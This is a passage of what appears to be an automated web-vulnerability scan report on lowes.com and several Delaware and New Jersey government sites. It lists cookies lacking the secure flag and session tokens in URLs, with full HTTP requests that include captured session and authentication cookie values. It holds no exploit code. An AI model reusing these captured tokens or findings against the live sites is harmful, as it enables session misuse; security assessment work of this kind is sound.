Cookie: MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; cmSessionDepth=5; JSESSIONID=00006p0iP0nvmoy5cq0R483AFmL:14e1gr6ig; WC_SESSION_ESTABLISHED=true; WC_AUTHENTICATION_-1002=%2d1002%2cTYVD85anmjhYyITkSpmh9zJVTEc%3d; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TyvbcdVzvDpby%0a%2feY9VaffAc4y09NidpOD25XJ20Mzq3kFHMtHKZG5cVZbMeQ1YmOSeUpTBUkQnCB6RygNDVVlHA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2897564122%3atrue%3afalse%3a0%3aOT%2bvDkUlulLUJRWcNU3dyXdQe3g%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; TS176ebc=213d8656075767f35a1f9b520e396fbdceb6ace724ef15e34e1cfb7e; stop_mobi=yes

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 05 Jul 2011 17:15:57 GMT
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 238055
Expires: Wed, 13 Jul 2011 02:03:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 13 Jul 2011 02:03:06 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: akaau=1310524386~id=21017306f05776f813565f0d22f0d790; path=/

/* Reset CSS */
body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,form,fieldset,input,textarea,p,blockquote,th,td,button{margin:0;padding:0}table{border-collapse:collapse;border-spacing:0}fieldset,img
...[SNIP]...

3.8. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/common.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/javascript/common.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

akaau=1310524386~id=21017306f05776f813565f0d22f0d790; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/javascript/common.js HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
Referer: https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; cmSessionDepth=5; JSESSIONID=00006p0iP0nvmoy5cq0R483AFmL:14e1gr6ig; WC_SESSION_ESTABLISHED=true; WC_AUTHENTICATION_-1002=%2d1002%2cTYVD85anmjhYyITkSpmh9zJVTEc%3d; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TyvbcdVzvDpby%0a%2feY9VaffAc4y09NidpOD25XJ20Mzq3kFHMtHKZG5cVZbMeQ1YmOSeUpTBUkQnCB6RygNDVVlHA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2897564122%3atrue%3afalse%3a0%3aOT%2bvDkUlulLUJRWcNU3dyXdQe3g%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; TS176ebc=213d8656075767f35a1f9b520e396fbdceb6ace724ef15e34e1cfb7e; stop_mobi=yes

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 24 Jun 2011 11:20:33 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 60109
Expires: Wed, 13 Jul 2011 02:03:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 13 Jul 2011 02:03:06 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: akaau=1310524386~id=21017306f05776f813565f0d22f0d790; path=/

/*
* common.js
* Common javascript to be run on every page of the Lowes.com web site.
*
* Copyright Lowes, Inc.
*
* Last Modified On 03/04/2010
* Modified By R. Adams
*/

var lowes=
...[SNIP]...

3.9. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo-ext-lowes.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo-ext-lowes.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

akaau=1310524386~id=21017306f05776f813565f0d22f0d790; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo-ext-lowes.js HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
Referer: https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; cmSessionDepth=5; JSESSIONID=00006p0iP0nvmoy5cq0R483AFmL:14e1gr6ig; WC_SESSION_ESTABLISHED=true; WC_AUTHENTICATION_-1002=%2d1002%2cTYVD85anmjhYyITkSpmh9zJVTEc%3d; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TyvbcdVzvDpby%0a%2feY9VaffAc4y09NidpOD25XJ20Mzq3kFHMtHKZG5cVZbMeQ1YmOSeUpTBUkQnCB6RygNDVVlHA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2897564122%3atrue%3afalse%3a0%3aOT%2bvDkUlulLUJRWcNU3dyXdQe3g%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; TS176ebc=213d8656075767f35a1f9b520e396fbdceb6ace724ef15e34e1cfb7e; stop_mobi=yes

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 24 Jul 2009 13:05:12 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 154101
Expires: Wed, 13 Jul 2011 02:03:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 13 Jul 2011 02:03:06 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: akaau=1310524386~id=21017306f05776f813565f0d22f0d790; path=/

/*
   This is a compiled version of Dojo, built for deployment and not for
   development. To get an editable version, please visit:

       http://dojotoolkit.org

   for documentation and information on
...[SNIP]...

3.10. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

akaau=1310524386~id=21017306f05776f813565f0d22f0d790; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo.js HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
Referer: https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; cmSessionDepth=5; JSESSIONID=00006p0iP0nvmoy5cq0R483AFmL:14e1gr6ig; WC_SESSION_ESTABLISHED=true; WC_AUTHENTICATION_-1002=%2d1002%2cTYVD85anmjhYyITkSpmh9zJVTEc%3d; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TyvbcdVzvDpby%0a%2feY9VaffAc4y09NidpOD25XJ20Mzq3kFHMtHKZG5cVZbMeQ1YmOSeUpTBUkQnCB6RygNDVVlHA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2897564122%3atrue%3afalse%3a0%3aOT%2bvDkUlulLUJRWcNU3dyXdQe3g%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; TS176ebc=213d8656075767f35a1f9b520e396fbdceb6ace724ef15e34e1cfb7e; stop_mobi=yes

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 15 Oct 2010 17:00:00 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 72756
Expires: Wed, 13 Jul 2011 02:03:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 13 Jul 2011 02:03:06 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: akaau=1310524386~id=21017306f05776f813565f0d22f0d790; path=/

/*
   This is a compiled version of Dojo, built for deployment and not for
   development. To get an editable version, please visit:

       http://dojotoolkit.org

   for documentation and information on
...[SNIP]...

3.11. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/globalNavIE.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/javascript/globalNavIE.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

akaau=1310524386~id=21017306f05776f813565f0d22f0d790; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/javascript/globalNavIE.js HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
Referer: https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; cmSessionDepth=5; JSESSIONID=00006p0iP0nvmoy5cq0R483AFmL:14e1gr6ig; WC_SESSION_ESTABLISHED=true; WC_AUTHENTICATION_-1002=%2d1002%2cTYVD85anmjhYyITkSpmh9zJVTEc%3d; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TyvbcdVzvDpby%0a%2feY9VaffAc4y09NidpOD25XJ20Mzq3kFHMtHKZG5cVZbMeQ1YmOSeUpTBUkQnCB6RygNDVVlHA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2897564122%3atrue%3afalse%3a0%3aOT%2bvDkUlulLUJRWcNU3dyXdQe3g%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; TS176ebc=213d8656075767f35a1f9b520e396fbdceb6ace724ef15e34e1cfb7e; stop_mobi=yes

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 11 Nov 2010 21:24:51 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 11
Expires: Wed, 13 Jul 2011 02:03:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 13 Jul 2011 02:03:06 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: akaau=1310524386~id=21017306f05776f813565f0d22f0d790; path=/

/* empty */

3.12. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

akaau=1310524386~id=21017306f05776f813565f0d22f0d790; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
Referer: https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; cmSessionDepth=5; JSESSIONID=00006p0iP0nvmoy5cq0R483AFmL:14e1gr6ig; WC_SESSION_ESTABLISHED=true; WC_AUTHENTICATION_-1002=%2d1002%2cTYVD85anmjhYyITkSpmh9zJVTEc%3d; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TyvbcdVzvDpby%0a%2feY9VaffAc4y09NidpOD25XJ20Mzq3kFHMtHKZG5cVZbMeQ1YmOSeUpTBUkQnCB6RygNDVVlHA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2897564122%3atrue%3afalse%3a0%3aOT%2bvDkUlulLUJRWcNU3dyXdQe3g%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; TS176ebc=213d8656075767f35a1f9b520e396fbdceb6ace724ef15e34e1cfb7e; stop_mobi=yes

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Tue, 28 Apr 2009 19:56:32 GMT
ETag: "1f8e59-22f6-dc02bc00"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 8950
Expires: Wed, 13 Jul 2011 02:03:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 13 Jul 2011 02:03:06 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: akaau=1310524386~id=21017306f05776f813565f0d22f0d790; path=/

/* Nifty Corners Cube - rounded corners with CSS and Javascript
Copyright 2006 Alessandro Fulciniti (a.fulciniti@html.it)

This program is free software; you can redistribute it and/or modify
it u
...[SNIP]...

3.13. https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowes.com
Path:	/webapp/wcs/stores/servlet/LogonForm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

TS176ebc=213d8656075767f35a1f9b520e396fbdceb6ace724ef15e34e1cfb7e; Path=/
akaau=1310524386~id=21017306f05776f813565f0d22f0d790; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; cmSessionDepth=5

Response

4. Session token in URL previous next
There are 5 instances of this issue:

http://de.gov/
http://server.iad.liveperson.net/hc/33511087/
http://www.delaware.gov/
http://www.njleg.state.nj.us/
http://www.njleg.state.nj.us/Default.asp

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

4.1. http://de.gov/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://de.gov
Path:	/

Issue detail

The response contains the following links that appear to contain session tokens:

http://server.iad.liveperson.net/hc/33511087/?cmd=file&file=visitorWantsToChat&site=33511087&byhref=1&SESSIONVAR!skill=Corp_Info&imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/corp/info/
http://server.iad.liveperson.net/hc/33511087/?cmd=file&file=visitorWantsToChat&site=33511087&byhref=1&SESSIONVAR!skill=Portal_Help&imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/portal/
http://server.iad.liveperson.net/hc/33511087/?cmd=file&file=visitorWantsToChat&site=33511087&byhref=1&SESSIONVAR!skill=Rev_BIT&imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/revenue/taxbus/

Request

GET / HTTP/1.1
Host: de.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:55:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 145159

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">
<head>
<meta name="verify-v1" content="thP3VfXQ653dVrb9ExI9XqvyNnfVO9/R4FszK
...[SNIP]...
<strong><a href="http://server.iad.liveperson.net/hc/33511087/?cmd=file&file=visitorWantsToChat&site=33511087&byhref=1&SESSIONVAR!skill=Corp_Info&imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/corp/info/" onClick="lpButtonCTTUrl = 'http://server.iad.liveperson.net/hc/33511087/?cmd=file&file=visitorWantsToChat&site=33511087&SESSIONVAR!skill=Corp_Info&imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/corp/info/&referrer='+escape(document.location); lpButtonCTTUrl = (typeof(lpAppendVisitorCookies) != 'undefined' ? lpAppendVisitorCookies(lpButtonCTTUrl) : lpButtonCTTUrl); openPopup(lpButtonCTTUrl,475,400,'chat33511087');return false;">Division of Corporations</a></strong> - M-F: 8:30 to 4:00 (EST) - <a href="http://server.iad.liveperson.net/hc/33511087/?cmd=file&file=visitorWantsToChat&site=33511087&byhref=1&SESSIONVAR!skill=Corp_Info&imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/corp/info/" onClick="lpButtonCTTUrl = 'http://server.iad.liveperson.net/hc/33511087/?cmd=file&file=visitorWantsToChat&site=33511087&SESSIONVAR!skill=Corp_Info&imageUrl=http://portal.delaware.gov/help/images/liveperson/icons/corp/info/&referrer='+escape(document.location); lpButtonCTTUrl = (typeof(lpAppendVisitorCookies) != 'undefined' ? lpAppendVisitorCookies(lpButtonCTTUrl) : lpButtonCTTUrl); openPopup(lpButtonCTTUrl,475,400,'chat33511087');return false;">Start Chat</a><br>
